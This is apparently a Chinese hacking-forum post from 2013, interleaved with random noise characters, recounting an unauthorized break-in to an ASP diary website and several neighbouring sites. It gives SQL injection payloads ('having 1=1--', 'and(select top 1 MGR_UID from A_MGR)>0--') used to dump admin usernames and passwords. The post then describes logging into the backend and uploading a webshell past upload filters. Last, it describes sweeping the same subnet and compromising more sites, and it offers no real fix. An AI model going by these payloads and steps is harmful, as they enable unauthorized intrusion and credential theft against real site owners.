发现一个注入点
6 m$ l) J8 t: j4 |2 b' qhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
% _* Z9 \7 h8 z; Q$ F3 z- j7 |5 l/ O% U/ H+ I+ M2 Y Y
习惯性的加’having1=1--
: _- k" J8 O. ~; J- [0 ^6 H
6 |6 ~- a+ f, Q1 n3 Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
7 P/ D- {4 H; |( H4 O5 N9 Z$ r/ a& ?. C7 N$ ]3 \
0" ]2 R; U. F% V9 ~# ~
+ D! x W+ i2 p5 r8 l$ X爆出Diary_A.dl_Title(这时候很激动啊)
- C% w- @( G8 A7 E3 c, O& v. s7 m
- g5 o ~+ N2 k3 K7 B& ~" w那么继续) s ~5 Z- R( L
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—9 T& r0 K( |% y. K. g! H. P' M5 f) u
& B3 z: C+ I/ J: \- T. i继续,一直爆下去
2 W: @1 [- w }- V# |5 V4 x; C6 z$ B5 {
爆到几个字段和表段 但是没找到需要的管理用户的字段
2 s8 D) W1 E% b3 i7 u
# E8 l$ g3 ~" j" }蛋疼了 怎么办 然后去后台登陆页看源码
+ g! x2 U/ q: S; h$ @0 o2 p; ?) g" ]/ n& ~$ Z' a
03 q8 g/ w, w! U6 x6 Z1 Y# a
\9 o: y. U; C+ D
Input name= “ADUID”, O5 Q% @6 g |3 K; ^0 T; E
Input name= “ADPWD”
) \2 ?) B# h( g% F, F. w# i& J
6 f# v8 ^7 v6 Y( w很幸运 找到了字段那就继续% s, W" `- o& P8 ^3 J& m. \
找到之后开始爆用户
) l, S ^$ C) I5 Z# g7 Jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
. O5 @# [$ `! d3 F5 `爆密码* P8 }3 C, b( N4 k4 I& I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
/ }+ o* {: ^7 j- V8 d测试了下 这个注入点只能爆到文章哪里的表 / [" h1 y" h& u0 C
4 T4 C8 m$ `' N/ G; {头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了4 k+ [. Y1 N% |, n! ]% t
8 f/ v8 V( Z; O& ^0 V& |# L- s又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
" P: K. o& q! U# ? g' _: d- B/ \5 \3 e0 K' w
473
9 d& `( x$ w* [/ [; S
! A5 [7 F6 O: ~: U/ b( W. {4 _& P- q2 Y进后台
! v( B! B7 r3 k( Z0 @) j |2 Y7 F5 j1 y9 @# R% ~: w+ {" }
3 U+ ~. M. U& j# [% w+ X8 m
发现几个上传点 有的地方不能上传 而且防止恶意代码; ~' M7 e& T1 S( C
2 ^9 e; P5 j7 Q$ W
没办法 各种百度各种找大牛 找到一只好像可以突破的马
5 d2 `/ t g9 Z
q' }$ F# A' [( ?7 F( m& `4 ]$ g1 b9 n
在系统管理那里直接上传 不过没有显示地址
& j/ s6 e5 L7 A) Q
( c9 Z* M" m, n, |6 }* H9 T再上传一次 抓包 搞定OK
' z$ Z Q8 G+ n3 y! t) Q" w. v9 w
3 j* K, V3 m" O" [$ K7 W- ~
: d) }3 p' ~* O1 z2 h# O4720 E4 _: c' v- |9 n- I; t
3 f! f4 I5 G' j# ]0 n$ ^* h7 q晚上不行了 去睡觉。。。* c8 W$ `% p1 r0 i
第二天刚起床 闲的没事做继续日站吧
& s. G8 h2 J9 J1 v" \4 ~
! J$ l6 p$ D2 d$ u1 T' r找个站 就把这个站的旁c扫了下
" L% B4 X, A0 P: e- j* {$ d$ J) `8 w3 l+ o
发现c段也有一个购物站 ,然后还和这个站的模板差不多" c7 v% T, n6 t8 c
) S- |' d3 V$ j" E, \# V0 M就找到会员登录口测试
6 l+ S$ D, L2 K6 ?1 a" i# Z" L1 R4 p; u4 H3 H
'and (select top 1 MGR_UID from A_MGR)>0—: P0 X$ ? r* X5 G4 N9 I- _
果断爆到了 这时候我很激动 通杀
! N7 P0 T5 |2 D# U% A
+ v( M( y3 B% j* B/ f" c4 q再次翻c段
]" V, {( P$ `, ]1 z/ p" S7 V% P2 h8 r1 o% |1 J( C5 f
翻出几个站 都成功拿下
3 n6 K: v! I1 m$ A' _( I6 w( i
- r- T4 d0 C+ o5 |; P& d# B- v2 p( J3 k* ]$ g* _
Y6 Y+ p7 H; b I
修复方案:: Q M3 `! S @* }$ o7 H% \! [& c
他们比我专业 - F S ~, J/ n$ q, R F
+ ]! q9 @$ |% t1 t& g" t' H) u3 q, I* q1 a
/ |+ v Z: s5 z* s
|
发表于 2013-4-4 17:40:38
收藏
分享
支持
反对